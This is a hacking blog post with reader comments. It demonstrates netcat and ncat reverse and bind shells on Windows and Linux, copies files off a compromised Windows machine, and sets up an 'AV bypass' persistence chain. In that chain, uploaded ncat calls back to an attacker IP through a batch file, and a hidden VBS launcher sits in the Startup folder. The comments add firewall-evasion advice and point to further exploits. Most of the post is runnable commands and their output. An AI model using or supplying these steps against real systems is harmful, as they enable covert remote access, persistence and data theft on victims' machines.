control – netcat

Netcat 1.10
===========                                                        /\_/\       
                                                                  / 0 0 \      
Netcat is a simple Unix utility which reads and writes data      ====v====     
across network connections, using TCP or UDP protocol.            \  W  /      
It is designed to be a reliable "back-end" tool that can          |     |     _
be used directly or easily driven by other programs and           / ___ \    / 
scripts.  At the same time, it is a feature-rich network         / /   \ \  |  
debugging and exploration tool, since it can create almost      (((-----)))-'  
any kind of connection you would need and has several            /             
interesting built-in capabilities.  Netcat, or "nc" as the      (      ___     
actual program is named, should have been supplied long ago      \__.=|___E    
as another one of those cryptic but standard Unix tools.      

Windows 
C:\Documents and Settings\host\Desktop>nc -lvvp 4444 -e cmd.exe

Linux
root@bt:~# nc -v 192.168.1.2 4444
10.255.245.136: inverse host lookup failed: Unknown server error : 
Connection timed out
(UNKNOWN) [192.168.1.2] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\host\Desktop>

------------------------------------------------------------

Windows

C:\Documents and Settings\host\Desktop>nc -lvvp 4444
listening on [any] 4444 ...

Linux

root@bt:~# nc -v 192.168.1.4 4444 -e /bin/bash
10.255.245.136: inverse host lookup failed: Unknown server error : 
Connection timed out
(UNKNOWN) [192.168.1.4] 4444 (?) open

Back on windows type ifconfig

C:\Documents and Settings\host\Desktop>nc -lvvp 4444
listening on [any] 4444 ...
192.168.1.4: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.255.245.136] from (UNKNOWN) [192.168.1.4] 59987: NO_DATA

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:01:02:03:04:05
          inet addr:192.168.1.4  Bcast:10.255.245.255  Mask:255.255.255.0

------------------------------------------------------------
to make a windows machine connect back to backtrack machine.

open terminal and type in nc -lvvp 80

root@bt:~# nc -lvvp 80
listening on [any] 80 ...

then on the windows machine typing the following will make it 
dial back to your machine.

ncat -v your-ip-address 80 -e cmd.exe

C:\Program Files\Nmap>ncat -v your-ip-address 80 -e cmd.exe
Ncat: Version 6.00 ( http://nmap.org/ncat )
Ncat: Connected to your-ip-address:80.

The Windows machine should now have connected to you 
you should be able to see this in the open window on your backtrack machine.
==============================================

Once connected you may want to send files back from the windows machine to backtrack

open a new Window in backtrack type in

ncat -v -lp 2223 > test-doc.txt

root@bt:~# ncat -v -lp 2223 > test-doc.txt
Ncat: Version 5.61TEST4 ( http://nmap.org/ncat )
Ncat: Listening on :::2223
Ncat: Listening on 0.0.0.0:2223

In the window that has the connection to the Windows machine 
move to the directory that has the file you want and type in 

ncat --send-only your-ip-address 2223 < test-doc.txt

C:\Program Files\Cisco Systems\VPN Client\Profiles>ncat --send-only your-ip-address 2223 < test-doc.txt
ncat --send-only your-ip-address 2223 < test-doc.txt

then go to your root folder in backtrack and look for the file 
you moved across here it was called test-doc.txt

you can move any file not just .txt!

==============================================
Linux - Linux

root@bt:~# nc -lvvp 4444

root@bt:~# nc -v 192.168.1.4 4444 -e /bin/bash

==============================================

Continued AV Bypass testing.

Testing with Win 7

Were not ready to release the initial exploit that helped get us to a meterpreter session.

If honest because it does not trigger under any AV.

Once exploited uploading the following listed does not trigger AV
All files can be found by installing nmap on a windows machine. Open the installed folder and copy out what you require.

meterpreter > upload /root/nmap/ C:\
[*] uploading : /root/nmap//ncat.exe -> C:\\ncat.exe
[*] uploaded : /root/nmap//ncat.exe -> C:\\ncat.exe
[*] uploading : /root/nmap//libeay32.dll -> C:\\libeay32.dll
[*] uploaded : /root/nmap//libeay32.dll -> C:\\libeay32.dll
[*] uploading : /root/nmap//VBS.vbs -> C:\\VBS.vbs
[*] uploaded : /root/nmap//VBS.vbs -> C:\\VBS.vbs
[*] uploading : /root/nmap//Notes -> C:\\Notes
[*] uploaded : /root/nmap//Notes -> C:\\Notes
[*] uploading : /root/nmap//nc.bat -> C:\\nc.bat
[*] uploaded : /root/nmap//nc.bat -> C:\\nc.bat
[*] uploading : /root/nmap//ssleay32.dll -> C:\\ssleay32.dll
[*] uploaded : /root/nmap//ssleay32.dll -> C:\\ssleay32.dll
[*] uploading : /root/nmap//nmap.exe -> C:\\nmap.exe
[*] uploaded : /root/nmap//nmap.exe -> C:\\nmap.exe

————————————————————
nc.bat script,

C:\ncat.exe -v 10.255.245.135 443 -e cmd.exe

VBS.vbs script used to run the nc.bat script invisibly,

Set WshShell = CreateObject(“WScript.Shell” )
WshShell.Run chr(34) & “C:\nc.bat” & Chr(34), 0
Set WshShell = Nothing

————————————————————
Gaining shell so we can move VBS.vbs to the start up folder. Making the script trigger each time user logs in.

meterpreter > execute -f cmd.exe -c
Process 3176 created.
Channel 8 created.

meterpreter > shell
Process 3864 created.
Channel 11 created.
Microsoft Windows [Version 6]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\test\Documents>move C:\VBS.vbs “C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”

1 file(s) moved.

————————————————–

Rebooting the Win 7 box to test if the start up script works.

C:\Users\test\Documents>shutdown -r -t 0

————————————————–

Back on backtrack open a new terminal and set up nc listener.
Once the person reboots back into the account the VBS.vbs will run

root@bt:~# nc -lvvp 443
listening on [any] 443 …
Remote-IP: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.255.245.135] from (UNKNOWN) [Remote-IP] 49156
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Updates

https://myexploit.wordpress.com/control-netcat-av-bypass/

6 thoughts on “control – netcat

    1. Hi andrej, Thanks for the question I appropriate that you read the blog. Quick reply yes it should work. If on the windows machine you typed

      ncat -v your-machines-ip-address 80 -e cmd.exe

      The windows machine will connect out on port 80 http so will look just like normal internet traffic. Firewalls normally do not block http. Exception on this is larger estates that use a proxy and there internal Firewall only allows access for the proxy out to the internet.

      try tunneling all your traffic over port 80 on different note you could change the FW or turn it off once you have access via ncat any way.

      Give it a try with regards to OS netcat dosn’t care if windows xp, vista, 7 or Linux.

      Its a very good tool.

      Reply

  2. Thank you for your reply:
    It’s working :
    My Test:

    1.NetCat – test – Windows Vista Home Basic SP1 FireWall is On
    c:\tools>nc -l -v -p80 -e cmd.exe
    listening on [any] 80 …
    192.168.235.10: inverse host lookup failed: h_errno 11004: NO_DATA
    connect to [192.168.235.1] from (UNKNOWN) [192.168.235.10] 34431: NO_DATA

    2.VMware – BackTrack 5R2

    root@bt:~# nc -v 192.168.235.1 80 –
    192.168.235.1: inverse host lookup failed: Unknown server error : Connection timed out
    (UNKNOWN) [192.168.235.1] 80 (www) open
    Microsoft Windows [Wersja 6.0.6002]
    Copyright (c) 2006 Microsoft Corporation. Wszelkie prawa zastrze?one.

    c:\tools>dir
    dir
    Wolumin w stacji C to OS
    Numer seryjny woluminu: 6892-B5E7

    Katalog: c:\tools

    ———————————————————————————————
    But – The Windows firewall detects and, by default, blocks programs from opening
    TCP/IP sockets and listening for incoming connections.
    How do I add exceptions to the firewall ???
    I can’t find good “exploit” for windows vista 🙂 It is a fortress ??? 🙂

    Reply

    1. Great to see you testing. For adding exceptions to Windows firewall please look at

      http://www.myexploit.wordpress.com/control-windows-firewall-from-the-command-line/

      A quick example below should allow port 80 in on Win 7 so should work on vista?

      netsh advfirewall firewall add rule name=”Open Port 80″ dir=in action=allow

      You could change the port number to any you require.

      With regards to exploiting Vista/Win7 we have fully agreement it’s been improved and now hard to exploit. Best way is to look at exploiting the apps on it. Browsers are still very exploitable. Try this example in your lab.

      http://www.myexploit.wordpress.com/control-metasploit-browser_autopwn/

      Reply

    1. Hi Andrej no problem happy you looked at the blog.
      Forget metasploit-ms08_067_netapi exploit the buffer overflow was fixed with an update for XP and by default in vista onwards. So no joy with Win 7.

      Conficker uses the ms08_067_netapi exploit so as you can imagine a larger percentage of estates have now defended against it. As they should! Also its rare to find port 445 open on the outside.

      With regards to Win7 exploit have a go at

      http://www.myexploit.wordpress.com/control-respect-to-armitage1989/

      This will slip past AV and works against Win7

      Reply

Leave a comment